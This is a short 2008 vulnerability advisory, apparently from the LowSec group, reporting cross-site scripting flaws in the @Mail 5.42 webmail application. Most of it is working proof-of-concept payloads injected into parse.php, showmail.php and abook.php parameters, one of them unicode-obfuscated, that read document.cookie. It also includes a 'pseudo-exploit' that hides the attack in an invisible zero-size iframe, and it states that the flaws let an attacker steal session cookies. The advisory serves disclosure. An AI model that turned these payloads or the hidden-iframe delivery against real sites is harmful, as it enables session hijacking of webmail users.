#=======================================================================#
	.____                   _________            ._.
	|    |    ______  _  __/   _____/ ____   ____| |
	|    |   /  _ \ \/ \/ /\_____  \_/ __ \_/ ___\ |
	|    |__(  <_> )     / /        \  ___/\  \___\|
	|_______ \____/ \/\_/ /_______  /\___  >\___  >_
	        \/                    \/     \/     \/\/
			(http://wwwlowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 30/08/08
Application:  @Mail 5.42 (28/11/2007)
Product WebSite: http://atmail.com/
Issues:
		[-]Cross-Site Scripting

#========================================================================#
#=============================[XSS]======================================#

This application suffers from numerous Cross-Site Scripting.With some 
JavaScript knowledge, we are able to execute JS codes to stealcookies to 
use the sessions, or anothers changes/actions.

POC:

/parse.php?file="><img/src/onerror=alert(document.cookie)>
/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo='
/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo='
/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195
/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie)

Pseudo-Exploit:

<iframe src="http://www.victim.com/parse.php?file=%22%3E%3Cimg/src/onerror=alert(document.cookie)%3E" frameBorder="0" style="height:0px;width:0px;">


#========================================================================#
#========================================================================#
Contact:     C1c4Tr1Z <c1c4tr1z@lowsec.org>
		(http://wwwlowsec.org)
	LowSec! Web Application Security (Lab).
		   Deus ex Machina
#========================================================================#